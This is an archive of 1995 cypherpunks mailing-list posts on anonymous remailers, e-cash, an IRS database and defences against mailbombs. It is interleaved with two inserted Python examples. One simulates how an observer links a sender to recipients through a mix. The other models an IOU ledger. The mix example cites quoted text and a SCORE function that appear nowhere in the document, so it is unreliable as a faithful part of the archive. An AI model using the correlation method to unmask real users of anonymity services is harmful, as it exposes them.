"It is seldom that liberty of any kind is lost all at once."
						       -Hume
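
Added example, not part of either poster's message: a toy simulation of the correlation counting quoted above and of the bit-bucket idea. The plain co-occurrence count stands in for the SCORE function, which the quoted text elides; the user names, batch size and round count are constructed assumptions.

```python
"""Toy model of batch correlation against a mix, with and without decoys.

Constructed example: names, batch size and round count are assumptions,
and the score is a plain co-occurrence count, not the elided SCORE.
"""
import random

USERS = ["bob", "carol", "dave", "erin", "fred", "george", "harry",
         "ivan", "judy", "mallory", "niaj", "olivia", "peggy", "rupert"]
SENDERS = ["s%02d" % i for i in range(30)]   # background senders, not Alice


def run_mix(rounds, batch_size, decoys=(), p_alice=0.5, seed=1995):
    """Return what a passive observer of the mix sees: one
    (senders_in, recipients_out) pair of sets per batch."""
    rng = random.Random(seed)
    log = []
    for _ in range(rounds):
        pairs = []
        if rng.random() < p_alice:
            # Alice's real message to Bob, plus one copy per bit bucket.
            pairs.append(("alice", "bob"))
            pairs.extend(("alice", d) for d in decoys)
        # Fill the rest of the batch with unrelated background traffic.
        while len(pairs) < batch_size:
            pairs.append((rng.choice(SENDERS), rng.choice(USERS)))
        senders = {s for s, _ in pairs}
        recipients = {r for _, r in pairs}
        log.append((senders, recipients))
    return log


def alice_batches(log, target="alice"):
    """Number of batches in which the target was seen sending."""
    return sum(1 for senders, _ in log if target in senders)


def score(log, target="alice"):
    """Per user, count the batches in which `target` sent into the mix
    and that user received a message out of the same batch."""
    counts = {u: 0 for u in USERS}
    for senders, recipients in log:
        if target in senders:
            for u in recipients:
                counts[u] += 1
    return counts


def candidates(counts):
    """Users tied for the highest score: the observer's suspect set."""
    top = max(counts.values())
    return sorted(u for u, c in counts.items() if c == top)


if __name__ == "__main__":
    plain = run_mix(rounds=300, batch_size=8)
    cover = run_mix(rounds=300, batch_size=8,
                    decoys=("fred", "george", "harry"))
    for label, log in (("no decoys", plain), ("three decoys", cover)):
        counts = score(log)
        print(label, "alice batches:", alice_batches(log),
              "suspects:", candidates(counts))
```

With decoys the suspect set grows from Bob alone to Bob plus the three bit buckets; that Alice is talking to someone in that set is still visible to the observer.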



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Fri, 20 Jan 95 12:21:09 PST
To: perry@imsi.com
Subject: Re: Electronic cash illegal? (fwd)
In-Reply-To: <9501201950.AA06204@snark.imsi.com>
Message-ID: <9501202019.AA01877@doom>
MIME-Version: 1.0
Content-Type: text/plain



> Re-read what was originally written carefully -- it claims neither
> that the dollar is backed nor that paper dollars are exchangeable for
> silver.
> 
> .pm

I interpreted ". . . the legal definition of a 'dollar' in the US is
still a certain weight of silver" to imply both.  Apologies if I
misconstrued.

> > Mark Chen says:
> > Derek writes:
> > > > As far as I know, the legal definition of a "dollar" in the US is still a
> > > > certain weight of silver, and payment in silver legally satisfies debts;
> > > > under current silver prices, that probably costs more than a 
> > > > $1 US Federal Reserve Note, so nobody bothers.
> > > 
> > > Uhh, no, US currency does not have any backing.  I believe it was
> > > Nixon who stopped it, possibly even earlier than him.  There _used_ to
> > > be Gold- and Silver-backed dollars, but no longer.
> > 
> > Correct.  Nixon dismantled the Bretton Woods system in (I think) '71.
> > 
> > 
> > --
> > Mark Chen 



--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Fri, 20 Jan 95 10:45:38 PST
To: cypherpunks@toad.com
Subject: IRS to keep unreviewable secret dossiers on US citizens
Message-ID: <9501201845.AA09218@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from : St Paul Pioneer Press, Jan 29, 1995

"IRS plans to collect more data on individuals to nab tax cheats"

a "vast expansion of secret computer database of information it
keeps on virtually all Americans" will include "credit reports,
news stories, tips from informants,  and real estate, motor vehicle
and child support records, plus conventional Govt financial data"

"Any individual who has business and/or financial activities can
expect upgraded agency reports to be put to IRS auditors promptly"

Here's the kicker: "Although agency officials concede that some of
the data collected will be inaccurate, taxpayers will not be allowed
to review or correct it"                         ^^^^^^^^^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^^^
So much for the FOIA.

------------------------------------------------------------------------
P M Dierking |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc Weber <blancw@microsoft.com>
Date: Fri, 20 Jan 95 12:49:29 PST
To: cypherpunks@toad.com
Subject: RE: IRS "DataBase"
Message-ID: <9501202049.AA05863@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain



A funny -    I just saw this in some email:

	"If guns are outlawed, how will liberals collect taxes?" --- A. Nonymous

 (Sorry, I didn't mean to bring up a crypto-unrelated political 
party/tax discussion.   This is *strictly* a matter for Logic and Anarchy.)

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Fri, 20 Jan 95 12:57:10 PST
To: Mark Chen <chen@intuit.com>
Subject: Re: Electronic cash illegal? (fwd)
In-Reply-To: <9501201930.AA01571@doom>
Message-ID: <Pine.SUN.3.91.950120124532.10660A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 20 Jan 1995, Mark Chen wrote:

> Derek writes:
> > . . .
> > Uhh, no, US currency does not have any backing.  I believe it was
> > Nixon who stopped it, possibly even earlier than him.  There _used_ to
> > be Gold- and Silver-backed dollars, but no longer.
> 
> Correct.  Nixon dismantled the Bretton Woods system in (I think) '71.

Well, sort of.  My understanding is that the US dollar is still
backed by gold on some theoretical bases.  Nixon just closed the
``gold window.''  That is, foreigners are no longer allowed to
get gold for greenbacks as was the case up until then.  Of course,
plain old Americans haven't been allowed to do that for the last
60 years or so.

As for FRNs, they are ultimately backed by a promise to pay in
``lawful money,'' i.e., US dollars.  Can you say Ponzi?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Fri, 20 Jan 95 12:06:24 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: The Remailer Crisis
Message-ID: <v02110105ab45c76cf24e@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:39 PM 1/20/95, Mark Chen wrote:
>>    From: frissell@panix.com (Duncan Frissell)
>>
>>    I offer to pay for and operate a remailer account on any system that will
>>    have me.
>>
>> best.com, based in Mt. View, CA.  Mail to postmaster@best.com, or try
>> the other standard extensions.
>
>As it happens, I just signed up for a SLIP account at Best.  I'm using
>their standard dial-up service, but they also offer a dedicated 28.8
>connection for $450 setup and $60/mo.

You know, these fees everybody keeps quoting sound remarkably like the cost
of a modem, the installation of a new phone line, plus a reasonable amount
of profit. So why don't a bunch of you, say in the Bay Area, get together
to get a small subnet, each buy your own pair of modems, pay for the added
phone line, and install the whole shootin' match in Tim's house?

>Mark Chen

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: perry@imsi.com (Perry E. Metzger)
Date: Fri, 20 Jan 95 10:48:26 PST
To: cypherpunks@toad.com
Subject: IP security drafts
Message-ID: <9501201842.AA19064@webster.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain


The latest version of the proposal Bill Simpson and I have made for
the IPv4 security protocols (which are more or less the same as the
IPng proposals) is now available from the internet drafts directories
near you.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 20 Jan 95 11:00:02 PST
To: xpat@vm1.spcs.umn.edu
Subject: Re: IRS to keep unreviewable secret dossiers on US citizens
In-Reply-To: <9501201845.AA09218@toad.com>
Message-ID: <9501201859.AA06028@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



xpat@vm1.spcs.umn.edu says:
> Excerpts from : St Paul Pioneer Press, Jan 29, 1995
> 
> Here's the kicker: "Although agency officials concede that some of
> the data collected will be inaccurate, taxpayers will not be allowed
> to review or correct it"                         ^^^^^^^^^^^^^^^^^^^
> ^^^^^^^^^^^^^^^^^^^^^^^
> So much for the FOIA.

The privacy act and FOIA make that more or less illegal -- if they are
keeping information on you, with certain law enforcement related
exceptions they have to let you see it.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Grant <mark@unicorn.com>
Date: Fri, 20 Jan 95 06:32:13 PST
To: cypherpunks@toad.com
Subject: Re: T.A.Z. on Disk
Message-ID: <Pine.3.89.9501201432.A753-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 20 Jan 1995, Angus Patterson wrote:

> I also saw another e-book site that had some more of his stuff, can't
> remember what it was though.

There's some more on the WWW at http://www.uio.no/~mwatz/bey/index.html.

		Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: xpat@vm1.spcs.umn.edu
Date: Fri, 20 Jan 95 12:46:08 PST
To: cypherpunks@toad.com
Subject: Re: IRS to keep unreviewable secret dossiers on US citizens
Message-ID: <9501202045.AA10950@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


perry@imsi.com says:
>xpat@vm1.spcs.umn.edu says:
>> Excerpts from : St Paul Pioneer Press, Jan 29, 1995
>>
>> Here's the kicker: "Although agency officials concede that some of
>> the data collected will be inaccurate, taxpayers will not be allowed
>> to review or correct it"                         ^^^^^^^^^^^^^^^^^^^
>> ^^^^^^^^^^^^^^^^^^^^^^^

>The privacy act and FOIA make that more or less illegal -- if they are
>keeping information on you, with certain law enforcement related
>exceptions they have to let you see it.

I should add that later in the article it suggests the scenario of
select information from the database being used in an audit, and
you would be able to contest the specific information they use
against you, but you would not be able to view any of the raw data.
                     ^^^^^^^^^
It sounds like this amounts to "we don't have the info until we use
it against you".

--------------------------------------------------------------------
P M Dierking |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jml@wizard.synapse.net
Date: Fri, 20 Jan 95 11:54:06 PST
To: cypherpunks@toad.com
Subject: internet world mag
Message-ID: <199501201953.OAA09328@sentinel.synapse.net>
MIME-Version: 1.0
Content-Type: text/plain


>>Sorry to bother you but can you tell me how to get this mag ?
>>thanks

If you can't find it at your local bookstore then contact:
Internet world p.o. box 713, Mt Morris, il, 61054, USA or via email
74671.3430@compuserve.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
wizard@alpha.c2.org
Give me the liberty to know, to utter, and to argue freely
according to conscience, above all liberties.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 20 Jan 95 11:50:26 PST
To: chen@intuit.com (Mark Chen)
Subject: Re: Electronic cash illegal? (fwd)
In-Reply-To: <9501201930.AA01571@doom>
Message-ID: <9501201950.AA06204@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Re-read what was originally written carefully -- it claims neither
that the dollar is backed nor that paper dollars are exchangeable for
silver.

.pm

Mark Chen says:
> Derek writes:
> > > As far as I know, the legal definition of a "dollar" in the US is still a
> > > certain weight of silver, and payment in silver legally satisfies debts;
> > > under current silver prices, that probably costs more than a 
> > > $1 US Federal Reserve Note, so nobody bothers.
> > 
> > Uhh, no, US currency does not have any backing.  I believe it was
> > Nixon who stopped it, possibly even earlier than him.  There _used_ to
> > be Gold- and Silver-backed dollars, but no longer.
> 
> Correct.  Nixon dismantled the Bretton Woods system in (I think) '71.
> 
> 
> --
> Mark Chen 
> chen@intuit.com
> 415/329-6913
> finger for PGP public key
> D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Fri, 20 Jan 95 12:59:16 PST
To: cypherpunks@toad.com
Subject: Place for WWW info/ stuff
Message-ID: <v01510100ab45d3b87784@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have a server (WWW and ftp) that I would like to use for anything anyone
needs a place for. Drop me a line, or visit what's on my server (see
below). The part of the server that I will be putting cypherpunk related
material is password controlled, and cannot be accessed unless you have an
account and password (assuming of course someone else doesn't break in and
figure someone's out that is... but I don't see how they could.)

This is just FYI for all and anyone!
Cheers,
- -J
-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLyAj5UiLvmPjc4XdAQEJsAP+Pd7A/I01zZUaXUi7vhIbk3XHijrgAhjZ
1ZqIVuiOIfddnS8w+hJ1bKrxZFoY9YRzNLx0rliBckEn+HVYOl4+qQQjZ3TqjhDw
FULRRD6DGS85ZLZ/rwKrlyrSPY6YywgzgyzlZcUa/UtQ9Ll66NA4R6c7VWQB+4K7
qBuOUaOWvV0=
=XXIw
-----END PGP SIGNATURE-----

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's January 29th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Fri, 20 Jan 95 15:20:55 PST
To: rishab@dxm.ernet.in
Subject: Re: The Remailer Crisis
In-Reply-To: <gate.1uq0yc1w165w@dxm.ernet.in>
Message-ID: <199501202316.PAA19895@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


rishab@dxm.ernet.in wrote:

> Tim urges recently that we need to do something about the "remailer crisis."
> 
> I remember Sameer once mentioning that he could set up remailer-in-a-box 
> accounts for possibly anonymous 'sponsors' who'd be the legal owners therefore
> indemnifying Sameer (the tolerant sysadmin) of responsibility. I know he allows
> 'remail-to-yourself' blind-server accounts for $10 / meg or something. That's
> probably a bit expensive for a sponsor of a public remailer (any stats on 
....

I of course agree with everything Rishab just said, because I've made
these points repeatedly over the last year or so. The
"remailer-in-a-box" was even my coinage, though I make no claims to
working on it more than just proposing some ideas.

I mention this because I sense a fair amount of frustration by many of
us that the same ideas keep coming up, keep getting general support,
but don't move along further. I've certainly felt this, and I know
others have, too.

(I sometimes think that nearly all messages here are just skimmed by
the readers, so the same stuff keeps bubbling up over and over again.)

Yet I'm not pointing a finger at the remailer operators or anyone
else. The problems are systemic, related to why things don't get done.

In any case, I strongly urge--and have several times now--that the act
of owning or operating a site be explicitly disconnected from the act
of having an account that does remailing.

Sites/Owners that allow remailing accounts ARE NOT THE SAME AS
accounts/owners that actually do the remailing! 

Further, there is no legal requirement (U.S.) that accounts be
"identifiable" publicly--and probably no legal requirement that
accounts be identifiable at _all_. Thus, I could buy (Rishab's
"sponsor") a remailer account on foo.bar for some amount of money,
paid with paper currency sent to the remailer (just to help defray
costs, not as a sophisticated "paid remailer" scheme).

(And if charges of abuse, or legal letters from the Church of Aptical
Foddering, cause the site owner to "shut down" account
remailer73@foo.bar, then a new account, remailer121@foo.bar can be
instantiated immediately. Nothing illegal about this, unless the site
itself is (somehow) declared to be a contributory nuisance or somesuch.)

For reasons which should be apparent to all, having my name, or any
other name, attached to a remailer (e.g., "Tim-Remailer@foo.bar")
could invite deliberate attacks, spams, etc. Better to have remailers
have no such flags or invitations, a point several of you have also
commented on (in terms of picking domain names that are not
inflammatory or that will not trigger local scrutiny).

Like Duncan F., I will be willing to sponsor or buy some remailer
accounts. How many I sponsor will depend on the price, features,
reliability, etc. (Please do not post "Hey, I'm willing to do this,
so send me your $100 now." messages....for obvious reasons.)

I am waiting for such services to be actually, formally, solidly
announced, not just casual remarks that it might be possible. And of
course the software should be "ready to wear," port-a-potty, so that
the remailer account owner does nothing more than pay for the account.

(Aside: I strongly recommend that some emergent naming conventions be
discussed. For example, the "remailers-in-a-box" may need to be "no
frills" remailers, with no errors reported to the sender, no help to
those who send the wrong instructions, no hand-holding, and even _no
further contact_ between those who sponsored/bought the accounts and
the account itself! This could be marked as "anon-nf-137@foo.bar,"
meaning, an anon account, no frills, number 137 (of many more,
hopefully). And so on.)

And it will also depend on site reliability, uptime, etc. One site I
would otherwise be tempted to sponsor a remailer account on recently
took 5 days to forward a test message, so the problems are
apparent. (I believe remailer operators need to _promote_ their sites,
by citing uptimes, features, policies....but this is another one of
those ideas that keeps coming up over and over again, from various
people.)

The "crisis" I am talking about is that we are down to a handful of
sites, down from nearly 20 at one time, and with no apparent upward
trend in numbers.

Separating the act of having the courage/dedication to allow remailers
from the act of operating remailers out of accounts is the key.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 20 Jan 95 15:55:31 PST
To: cypherpunks@toad.com
Subject: Why emoney?  Why not a web of debt?
Message-ID: <199501202354.PAA13275@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


  [summary -- digital silk road along a web of debt-trust]

  Umm... money is not anything mystical -- it is just a convenient
way to trade and settle debts.  It was invented to solve the hassles
of trading a pound of butter, for a box of eggs, that for a tightly
woven basket, and finally that for the gun you wanted in the first
place.  Yuch! accounting!!

  But electronic computers are good at checking out these kinds of
chains automatically.  Suppose there were a web of debt-trust.  Each
person would indicate the other people whose IOUs they will accept
(and the amount they would be willing to take).  Thus I might take (up
to $10 of) Jo's, who might take Carol's who might take Terry's, etc.

  To buy something from me online, you will need to produce an IOU
from Jo, Carol or Terry.  I would hand it to Jo for verification.  Jo
would accept it or reject it (perhaps after talking to some other
folks online).  If it were a CarolIOU, or a TerryIOU I would insist Jo
trade it for a JoIOU.  All the details could be hidden behind a nice
little GUI.

  Jo and I would continuously balance the books between us by trading
JoIOUs for NoybIOUs.  After a while one of us might well end up with
enough extra IOUs that we want to get paid.  Perhaps the other would
perform services directly, or pay FRN's or gold, or whatever.

  If one of my friends wasn't able to run an online IOU server, I could
probably trade things with my friend for IOUs.  Not that I'm running
a bank or anything.

  Without everyone being online though I don't see an easy way to
prevent double spending.  Is there an offline multiple exchange token
system invented yet?

  Noyb
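
[Added example, not part of the original post: a Python sketch of the web of debt-trust described in the message above, showing the chain of acceptance with per-person limits and the issuer's online check against double spending. The class and method names, the serial numbers on IOUs, and the single in-memory ledger standing in for every participant's online server are assumptions made for illustration.]

```python
from collections import deque


class DebtWeb:
    """Toy model of the post's web of debt-trust (all names are hypothetical)."""

    def __init__(self):
        self.limit = {}         # (acceptor, issuer) -> most of issuer's IOUs acceptor will hold
        self.held = {}          # (acceptor, issuer) -> amount acceptor holds right now
        self.presented = set()  # (issuer, serial) already honoured; serials are an assumption

    def trust(self, acceptor, issuer, limit):
        """Record that `acceptor` will take up to `limit` of `issuer`'s IOUs."""
        self.limit[(acceptor, issuer)] = limit
        self.held.setdefault((acceptor, issuer), 0)

    def room(self, acceptor, issuer):
        """How much more of `issuer`'s paper `acceptor` is still willing to hold."""
        return self.limit.get((acceptor, issuer), 0) - self.held.get((acceptor, issuer), 0)

    def find_chain(self, seller, issuer, amount):
        """Breadth-first search from the seller towards the issuer.

        Returns [seller, ..., issuer] in which every person still has room to
        take `amount` of the next person's IOUs, or None if no chain exists.
        """
        queue = deque([[seller]])
        seen = {seller}
        while queue:
            path = queue.popleft()
            here = path[-1]
            if here == issuer:
                return path
            for acceptor, other in self.limit:
                if acceptor == here and other not in seen and self.room(here, other) >= amount:
                    seen.add(other)
                    queue.append(path + [other])
        return None

    def pay(self, seller, iou):
        """Offer iou = (issuer, serial, amount) to `seller`; return the chain used.

        Raises ValueError for a replayed serial (the online double-spend check)
        or when nobody the seller trusts will stand behind the issuer.
        """
        issuer, serial, amount = iou
        if amount <= 0:
            raise ValueError("amount must be positive")
        if (issuer, serial) in self.presented:
            raise ValueError("double spend: %s IOU #%s already presented" % (issuer, serial))
        chain = self.find_chain(seller, issuer, amount)
        if chain is None:
            raise ValueError("no chain of trust from %s to %s for %s" % (seller, issuer, amount))
        self.presented.add((issuer, serial))
        # Each hop swaps the IOU for one of its own, so every acceptor along
        # the chain ends up holding `amount` more of the next person's paper.
        for acceptor, other in zip(chain, chain[1:]):
            self.held[(acceptor, other)] += amount
        return chain


def demo():
    """Constructed scenario using the names and the $10 limit from the post."""
    web = DebtWeb()
    web.trust("Noyb", "Jo", 10)
    web.trust("Jo", "Carol", 25)
    web.trust("Carol", "Terry", 25)
    results = []
    offers = [
        ("Terry", 1, 6),  # accepted through Jo and Carol
        ("Terry", 1, 6),  # same serial again: rejected by the online check
        ("Terry", 2, 6),  # fresh serial, but Noyb has only $4 of room left for Jo
        ("Jo", 7, 4),     # fits exactly in the remaining room
    ]
    for iou in offers:
        try:
            results.append(web.pay("Noyb", iou))
        except ValueError as err:
            results.append(str(err))
    return results, web


if __name__ == "__main__":
    for line in demo()[0]:
        print(line)
```

The double-spend check works only because every presentation reaches the ledger, which is the online requirement the post ends on.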




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jack Repenning <jackr@dblues.engr.sgi.com>
Date: Fri, 20 Jan 95 17:19:40 PST
To: cypherpunks@toad.com
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <199501202354.PAA13275@jobe.shell.portal.com>
Message-ID: <16152.790650879@dblues.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain



Recently, someone wrote:

  But electronic computers are good at checking out these kinds of
  chains automatically.

Not that good.  Loss of connectivity, limited bandwidth, and
cumulative table size would all make this impractical very
quickly, I think.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Feuer <adamfast@seanet.com>
Date: Fri, 20 Jan 95 17:22:20 PST
To: cypherpunks@toad.com
Subject: Re: Why emoney? Why not a web of debt?
In-Reply-To: <ab46056806021004ab8a@[132.162.201.201]>
Message-ID: <Pine.NXT.3.91.950120171115.12961A-100000@kisa>
MIME-Version: 1.0
Content-Type: text/plain



Noyb asks if there are offline methods of IOU-token exchange...

  well, one way of doing it is LETS, the Local Exchange Trading System-- a
non-computerized way of exchanging value in a community. it doesn't
exactly use money. there are thousands of LETS's worldwide, i've never
used one and don't know how they work in practice, tho i'd like to find
out! they seem like a good idea. it seems like the ideas could be 
extended to the net-- there seems to be a synergy with digital 
signatures, etc.
   a good place to find info about LETS is: 

LETSystems - the Home Page

-adam
adamfast@seanet.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Fri, 20 Jan 95 17:45:41 PST
To: cypherpunks@toad.com
Subject: Remailers-in-a-box
Message-ID: <199501210129.AA01692@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Tim May wrote:

> I am waiting for such services to be actually, formally, solidly
> announced, not just casual remarks that it might be possible. And of
> course the software should be "ready to wear," port-a-potty, so that
> the remailer account owner does nothing more than pay for the account.

In this model, who deals with mailbombs/spams/requests for address blocks?
It is this sort of administrivia (plus the threat of liability) that
makes running a remailer troublesome, not a lack of someone's $20/month.

I think it's disingenuous to say that "X pays the bills for the network
link; X purchased the hardware and keeps it running; the box is in X's
house/office; X is the person who reads complaint mail and responds (or
fails to); but because Y sends X $20/month, the remailer (and attendant
liability for its mis/use) belongs to Y." I realize that there's a 
certain formal logic to it, but I don't think that anyone - not courts,
and not the world-in-general - is going to pay attention to that 
formalism when it's clear that a machine essentially under the control
of X is being used for 'antisocial' means.

I'm seriously considering offering this sort of remailer-in-a-box
thing, but there's a certain amount of hassle associated with running
a remailer. It can be shifted to different parties, but it must be
paid for one way or another.  

I guess it'd be possible to treat remailers as disposable - when one
had pissed off enough people, it could be abandoned - but this lack
of long-term reliability seems poor.
 

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyBjVX3YhjZY3fMNAQEI3QP/YdqBbhn5k4Q+NtD3zoJCG7qIfGaQqogH
AFFmItuU46rFQHHSxPl+p4fNmX+32yEva04ORq28NWPKggXiXhwN+LQDshWomSU8
gXkysIPdGeogSDxP6+JxXatE81TpuCjOtbGH3KlmCNaRbB0685zBVB7Oj1O/D5it
zqM9JuV8yAE=
=EQY5
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Fri, 20 Jan 95 15:34:06 PST
To: cypherpunks@toad.com
Subject: Spam Busters!
Message-ID: <Pine.3.89.9501201710.B13927-0100000@vern.bga.com>
MIME-Version: 1.0
Content-Type: text/plain


 
-----BEGIN PGP SIGNED MESSAGE-----
 
 
Yeah, the numbers should be higher.  This was just a hypothetical!
 
nzook@bga.com said:
 
>   There is little, if anything, we can do to stop a chained, PGP'ed mail
> bomb, "This is mail bomb number XXX.  Boom!" It is therefore in our best
> interest to not encourage children to send such messages in such a way.  I
> believe Homer's message was erroneous for this reason.
 
People, please!  Before criticizing a method, look at the threat model!  I
plainly stated that my method was not intended to deal with real trouble.
 
tcmay: "The From: line is notoriously misleading".
 
But it still gives enough that we need remailers in the first place, right?
The "From:" was a token.  It wasn't meant as a literal.  For id'ing
postmaster, all you need is the xx.xx.xx.xx, right?
 
jalicqui "Unless your remailer was the terminal remailer for a significant
number.."
 
But in a serious spam/mailbomb attack, someone would _have_ to get a bunch,
right?  With the changing session keys, and a chain, the best we could hope
for would be to stop it on its way out.  (or use for padding ;-)
 
Incidentally, a per/customer volume limit would also control the binaries.
Since we have little hope of id'ing the true originator, we might have to
limit a site. (bad)  OTOH, if someone tried to send binaries, only to find
that they couldn't get more than 1M out an hour, they would probably give
up & go somewhere else.  We might also hit the chained pgp bomber this way,
as the messages would likely be fairly large?
 
 
XXX
 
But this all misses a point that I would like to stress.  We are in what
the military refers to as "low-intensity combat".  Right now, we don't have
a continuous stream of spam-bombs floating through our systems.  (Well, we
did, but jp shut down :-(( )  Right now, we (other than PRZ) don't have
serious legal troubles.  Right now, our remailers are too weak to be a
significant problem to the TLAs (any more than a forged From:).
 
The way to win a low-intensity battle is to avoid escalating unless you are
sure you can win.  Eventually, we will have to standardize packets.
Eventually, we will have to employ very sophisticated techniques to deal
with spam-bomb.  But maybe we don't do that today.  Maybe we do just enough
to catch a bunch of the most juvenile.  Then the next bunch is smarter.
Then we catch them.  We keep going.  You see, I doubt that we can take on
a spammer that knows the net as well as anyone here.  But I don't doubt
that word can get out that the remailers nail spammers.  Of course, we risk
becoming the latest challenge to the juvenile, but I think that this is far
less likely than it appears at first because we are, after all, "really
cool".
 
My suggestion is to avoid, for as long as possible, letting on to _anyone_
just how sophisticated our systems are, just how much can be done, until we
are sure we can win the unavoidable battles.
 
 
XXX
 
This also strongly points to per-line blocking of remailers.  Since the
necessary steps to catch a sUPer bomber appear to be impossible/
impractical, we must offer anon-blocking for those poor souls that request
it.  Perhaps anon-block for a month at a time.  This is part of that PR
that we need to watch.
 
To put it another way, if our services make it easy(er) for someone to
engage in an activity that we oppose, and that can hurt (subjective)
someone else, we are facing a moral responsibility for our actions.  We
should attempt to fulfill that responsibility.
 
I believe that the phone company even allows people to change numbers for
free if they are receiving harassing calls.  And we want to be better
thought of than the phone company, right?
 
 
XXX
 
BTW, do you have to be a remailer operator to be on the list?  If not, I'd
like to know how to subscribe...
 
 
Finger or request keyserver for PGP 2.6.2 (tm) key.
PGP<->Mail/News installation incomplete.
 
Factors for modulus are not proven primes.  Key may be far weaker than
expected.  Encode at your own risk.
 
Key ID: 14712B4D 1994/12/26 Nathan H. Zook <nzook@bga.com>
Key fingerprint =  44 B3 D8 66 3D 55 1E 2E  F8 92 22 A6 33 8C DE 24 
 
 
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
 
iQEVAwUBLyBfUHmgMs8UcStNAQE7Ygf/Wg5+hKErgpqi+4J7jOAw97AitUnYn+z+
QJqAw4ar6hQEY/taC6ru5S8YjKYHwmXdR7n7YjSFjEy8aYwXSr4SaALICNhQsyrU
jcSuaMY0oUN2obYV6TxYtdVWaQVF9XBqW/8AlIcs+ZF4Yi7gqUdgf4aApuapW14e
drVi6PgV5ccg8a+wGBCdJhDy5AK0BJRtxUxtLDeb+MkaTOfk/ylLfBdbFV1iK7Ek
qDmpAZdd+FpwKoqBTm+jbCa/kemwFN5touLeLijRWjEuoqFK0x/YYRYsAjJUNqu/
Qt6YWqvat8t7UYlTauVsQ/9XJNxADxmWlrKaaQTxmsHrobq0h4s+RA==
=ykck
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 20 Jan 95 17:43:18 PST
To: cypherpunks@toad.com
Subject: Remailer In a Box available for beta testing
Message-ID: <199501210142.RAA28133@soda.CSUA.Berkeley.EDU>
MIME-Version: 1.0
